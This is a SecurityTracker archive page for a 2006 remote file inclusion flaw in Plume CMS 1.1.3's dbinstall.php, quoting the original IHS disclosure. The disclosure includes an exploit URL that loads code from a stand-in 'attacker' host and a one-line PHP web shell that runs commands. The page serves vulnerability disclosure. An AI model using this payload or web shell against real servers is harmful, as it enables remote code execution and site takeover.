SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   Plume CMS Vendors:   plume-cms.net
Plume CMS Include File Flaw in 'dbinstall.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016415
SecurityTracker URL:  http://securitytracker.com/id/1016415
CVE Reference:   CVE-2006-7021   (Links to External Site)
Updated:  Aug 12 2008
Original Entry Date:  Jun 30 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1.3
Description:   Hamid Ebadi of IRAN HOMELAND SECURITY team reported a vulnerability in Plume CMS. A remote user can include and execute arbitrary code on the target system.

The 'manager/tools/link/dbinstall.php' does not properly validate user-supplied input in the 'manager_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The original advisory is available at:

http://www.hamid.ir/security/
http://www.IHSteam.com

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.plume-cms.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Fri, 30 Jun 2006 06:04:21 -0700 (PDT)
Subject:  Plume CMS Remote File Inclusion

/*------------------------------------------------
		IHS Public advisory 
-------------------------------------------------*/

Plume CMS Remote File Inclusion

It uses PHP and MySql. With a single installation of
Plume you can have
multiple websites, file management, multiple authors
with different rights and websites in any languages
thanks to a full utf-8 support.
Plume CMS proposes a flexible plugin infrastructure to
extend it and is fully accessible with output
providing standard compliant code by default. 
http://plume-cms.net


Discovered by Hamid Ebadi 
Credit :
all go to IHS team (IHS : IRAN HOMELAND SECURITY)
www.ihsteam.com (persian)
www.ihsteam.net (english)


The original article can be found at: 
http://www.hamid.ir/security/
http://www.IHSteam.com

Vulnerable Systems:
	Plume CMS 1.1.3
	

Vulnerable Code :

[path]/plume-1.1.3/plume/manager/tools/link/dbinstall.php
//Vulnerable Code :line 39
require_once
$_PX_config['manager_path'].'/inc/class.checklist.php';
require_once
$_PX_config['manager_path'].'/extinc/class.xmlsql.php';



Exploits:

The following URL will cause the server to include
external files  
http://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls
-al&_PX_config[manager_path]=http://attacker/cmd.gif?

cmd.gif
<?
passthru($_GET['cmd']);
?>

Solution:
Edit the source code to ensure that input is properly
verified.


greeting :
LorD , NT , C0d3r of IHS

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC